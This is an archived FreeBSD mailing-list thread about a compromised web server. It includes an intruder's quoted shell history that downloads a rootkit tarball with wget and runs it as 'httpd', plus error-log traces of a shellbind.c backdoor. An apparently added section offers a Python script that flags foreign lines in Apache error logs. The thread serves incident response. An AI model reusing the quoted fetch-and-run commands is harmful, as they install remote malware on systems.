From owner-freebsd-questions@FreeBSD.ORG Wed Feb 9 17:41:43 2005
Delivered-To: freebsd-questions@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6793B16A4D2 for ; Wed, 9 Feb 2005 17:41:43 +0000 (GMT)
Received: from casbah.it.northwestern.edu (casbah.it.northwestern.edu [129.105.16.52]) by mx1.FreeBSD.org (Postfix) with ESMTP id D88A443D4C for ; Wed, 9 Feb 2005 17:41:42 +0000 (GMT) (envelope-from bret-walker@northwestern.edu)
Received: (from mailnull@localhost) by casbah.it.northwestern.edu (8.12.10/8.12.10) id j19Hfgk9020412; Wed, 9 Feb 2005 11:41:42 -0600 (CST)
Received: from medillbwpc (medill-bwpc.medill.northwestern.edu [129.105.51.23]) by casbah.it.northwestern.edu via smap (V2.0) id xma019386; Wed, 9 Feb 05 11:41:26 -0600
From: "Bret Walker"
To: "'Oliver Leitner'" ,
Date: Wed, 9 Feb 2005 11:41:26 -0600
Message-ID: <042101c50ece$944bbad0$17336981@medill.northwestern.edu>
X-Mailer: Microsoft Outlook, Build 10.0.6626
In-Reply-To: <20050209145353.304EC43D49@mx1.FreeBSD.org>
Subject: RE: httpd in /tmp - Sound advice sought
X-BeenThere: freebsd-questions@freebsd.org
List-Id: User questions
X-List-Received-Date: Wed, 09 Feb 2005 17:41:43 -0000

Thanks for letting me know.
I found this in my httpd error log:

[Fri Jan 14 13:06:06 2005] [error] [client 129.xxx.xxx.xxx] File does not exist: /usr/local/www/data/favicon.ico
wget: permission denied
./httpd: not found
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from pointer without a cast
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from pointer without a cast
./httpd: permission denied
./httpd: permission denied
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from pointer without a cast
./httpd: permission denied
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from pointer without a cast
./httpd: permission denied
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from pointer without a cast
[Fri Jan 14 21:40:12 2005] [error] [client 195.92.95.15] File does not exist: /usr/local/www/data-dist/xyzzy
[Fri Jan 14 21:40:21 2005] [error] [client 195.92.95.15] File does not exist: /usr/local/www/data-dist/xyzzy
[Sat Jan 15 21:36:33 2005] [error] [client 195.92.95.15] File does not exist: /usr/local/www/data-dist/xyzzy
[Sun Jan 16 21:54:06 2005] [error] [client 195.92.95.15] File does not exist: /usr/local/www/data-dist/xyzzy
[Sun Jan 16 23:58:22 2005] [error] mod_ssl: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!] (System error follows)
[Sun Jan 16 23:58:22 2005] [error] System: Connection reset by peer (errno: 54)

I also found shellbind.c in my /tmp directory. Is there a way to tell what type of exploit was used to get these files on my system (i.e. OpenSSL / PHP register_globals)? I've been monitoring this server from a port that mirrors its traffic using Ethereal, and all seems to be okay now. I also cvsuped -Rr my apache+mod_ssl install.
Thanks,
Bret

-----Original Message-----
From: owner-freebsd-questions@freebsd.org [mailto:owner-freebsd-questions@freebsd.org] On Behalf Of Oliver Leitner
Sent: Wednesday, February 09, 2005 8:48 AM
To: Bret Walker; freebsd-questions@freebsd.org
Subject: Re: httpd in /tmp - Sound advice sought

I know a certain hacking group who is trying to run their trojan as httpd; I discovered that info through some shell account I am running that has tried to start this rootkit on our machine.

Here's a short view from the shell's history:

---------------------
wget geocities.com/setan_maya/taek.tar.gz
cd ..
ls
cd ..
ls
cd tmp
ls
wget geocities.com/setan_maya/taek.tar.gz
tar zxvf taek.tar.gz
ls
cd taek
./httpd
chmod 755 httpd
./httpd
ls
cd ..
rm -rf taek
rm taek.tar.gz
-----------------------

This clearly shows that we have to do with a very dumb person, since he
1. didn't clean his history file
2. left the tar.gz file in his homedir
3. loaded the rootkit from the same server he is running the group's webpage on.
4. has a link to their chan on that page, and in the chan, as I've monitored for 48 hrs, I've found them posting their "successes" directly and unencrypted.

I have informed a number of providers and hosters that had their webpage posted into that chan, and informed them about the break-ins; so far I got no message back from them.

Of course, it's a long shot, but they didn't seem to check first if the folder tmp has the executable bit set at all, and they named their client like the file you've found.

I hope this helps you further.

Greetings
Oliver Leitner
Technical Staff
http://www.shells.at

On Tuesday 08 February 2005 14:35, Bret Walker wrote:
> Last night, I ran chkrootkit and it gave me a warning about being
> infected with Slapper. Slapper exploits vulnerabilities in OpenSSL up
> to version 0.96d or older on Linux systems. I have only run 0.97d.
> The file that set chkrootkit off was httpd which was located in /tmp.
> /tmp is always mounted rw, noexec.
>
> I update my packages (which are installed via ports) any time there is
> a security update. I'm running Apache 1.3.33/PHP 4.3.10/mod_ssl
> 2.8.22/OpenSSL 0.97d on 4.10. Register_globals was on in PHP for a
> couple of weeks, but the only code that required it to be on was in a
> .htaccess/SSL password protected directory.
>
> Tripwire didn't show anything that I noted as odd. I reexamined the
> tripwire logs, which are e-mailed to an account off of the machine
> immediately after completion, and I don't see anything odd for the
> 3/4 days before or after the date on the file. (I don't scan /tmp)
>
> I stupidly deleted the httpd file from /tmp, which was smaller than
> the actual apache httpd. And I don't back up /tmp.
>
> The only info I can find regarding this file being in /tmp pertains to
> Slapper. Could something have copied a file there? Could I have done
> it by mistake at some point - the server's been up ~60 days, plenty of
> time for me to forget something?
>
> This is a production box that I very much want to keep up, so I'm
> seeking some sound advice.
>
> Does this box need to be rebuilt? How could a file get written to
> /tmp, and is it an issue since it couldn't be executed? I run
> tripwire nightly, and haven't seen anything odd to the best of my
> recollection. I also check ipfstat -t frequently to see if any odd
> connections are happening.
>
> I appreciate any sound advice on this matter.
>
> Thanks,
> Bret

-- 
By reading this mail you agree to the following: using or giving out the email address and any other info of the author of this email is strictly forbidden. By acting against this agreement the author of this mail will take possible legal actions against the abuse.
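The error log excerpt in this thread carries the key forensic clue: gcc warnings, "wget: permission denied" and "./httpd: permission denied" are not Apache messages at all. Apache 1.3 connects the error log to the server's stderr, and any process a CGI or PHP script spawns inherits that stderr, so foreign output in error_log means something was executed under the web server's user. The following script is an added example, not code from the thread or from either poster: it separates such foreign lines from well-formed Apache 1.3 error_log entries and attributes each one to the client IP of the nearest preceding entry as a triage hint. The sample log is constructed to resemble the excerpt (TEST-NET addresses replace the real ones), and the function names are this example's own.

```python
import re
from collections import Counter

# Shape of an Apache 1.3 error_log entry:
#   [Day Mon DD HH:MM:SS YYYY] [level] [client A.B.C.D] message
# The "[client ...]" field is absent on server-level messages (mod_ssl,
# "System:" lines), so it is optional.  The client group is permissive so
# that a redacted address such as 129.xxx.xxx.xxx still parses.
ENTRY_RE = re.compile(
    r"^\[(?P<ts>[A-Z][a-z]{2} [A-Z][a-z]{2} [ \d]?\d \d\d:\d\d:\d\d \d{4})\] "
    r"\[(?P<level>[a-z]+)\] "
    r"(?:\[client (?P<client>[^\]]+)\] )?"
    r"(?P<msg>.*)$"
)

# Constructed sample modelled on the thread's excerpt; IPs are TEST-NET
# documentation addresses, not the ones from the real log.
SAMPLE_LOG = """\
[Fri Jan 14 13:06:06 2005] [error] [client 192.0.2.10] File does not exist: /usr/local/www/data/favicon.ico
wget: permission denied
./httpd: not found
shellbind.c: In function `main':
shellbind.c:16: warning: passing arg 2 of `memset' makes integer from pointer without a cast
./httpd: permission denied
[Fri Jan 14 21:40:12 2005] [error] [client 198.51.100.7] File does not exist: /usr/local/www/data-dist/xyzzy
[Sun Jan 16 23:58:22 2005] [error] mod_ssl: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!] (System error follows)
[Sun Jan 16 23:58:22 2005] [error] System: Connection reset by peer (errno: 54)
"""


def parse_entry(line):
    """Return the fields of a well-formed error_log entry, or None otherwise."""
    m = ENTRY_RE.match(line)
    return m.groupdict() if m else None


def find_foreign_lines(log_text):
    """Return (line_no, text, nearest_client) for every non-Apache line.

    Apache itself writes only timestamped entries.  A child process spawned
    by a CGI or PHP script inherits the server's stderr, so shell errors or
    compiler warnings landing here are output of something executed as the
    httpd user.  nearest_client is the client IP of the closest preceding
    well-formed entry: a hint about which request produced the output, not
    proof, since error_log is shared by all server children.
    """
    hits = []
    last_client = None
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        entry = parse_entry(line)
        if entry:
            if entry["client"]:
                last_client = entry["client"]
            continue
        hits.append((n, line, last_client))
    return hits


def foreign_output_by_client(log_text):
    """Count foreign lines per nearest preceding client IP."""
    return Counter(client for _, _, client in find_foreign_lines(log_text))


if __name__ == "__main__":
    for n, line, client in find_foreign_lines(SAMPLE_LOG):
        print(f"line {n:3d}  near client {client}: {line}")
    print(dict(foreign_output_by_client(SAMPLE_LOG)))
```

Run against the thread's own log, the "permission denied" lines would be flagged and attributed to the request just before them; they also confirm that the noexec mount on /tmp did its job, since the downloaded file could be written and chmod'ed but not run. Adjacency is only a starting point: the request that actually spawned the process is best confirmed by matching timestamps against access_log.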
_______________________________________________
freebsd-questions@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-questions
To unsubscribe, send any mail to "freebsd-questions-unsubscribe@freebsd.org"